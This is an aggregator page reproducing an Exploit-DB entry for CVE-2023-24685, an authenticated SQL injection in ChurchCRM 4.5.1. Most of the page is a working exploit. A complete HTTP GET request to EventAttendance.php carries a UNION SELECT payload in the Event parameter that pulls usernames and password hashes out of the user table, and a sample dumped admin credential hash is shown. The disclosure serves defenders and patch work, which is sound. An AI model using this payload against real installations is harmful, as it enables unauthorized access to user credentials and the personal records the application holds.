7
[webapps] ChurchCRM v4.5.1 - Authenticated SQL Injection
source link: https://www.exploit-db.com/exploits/51397
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
ChurchCRM v4.5.1 - Authenticated SQL Injection
# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection
# Date: 27-04-2023
# Exploit Author: Iyaad Luqman K
# Software Link: https://github.com/ChurchCRM/CRM/releases
# Vendor Homepage: http://churchcrm.io/
# Version: 4.5.1
# Tested on: Windows, Linux
# CVE: CVE-2023-24685
ChurchCRM v4.5.3 and below was discovered to contain a SQL injection vulnerability via the Event parameter
under the Event Attendance reports module.
- After Logging in, go to
```
GET /EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CRM-7bf048c51cd7d0923f0ab3e959c3d3f6=d99fjb19f2kp081ol95remfm6d
Connection: close
```
- The response will dump the `usr_Username` and `usr_Password` from the database.
```
PerseveranceAdmin:261f4aef6877ce6c11a780ae6c13e4e2f27a8a55f69d6d6785fc787063272db4
```
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK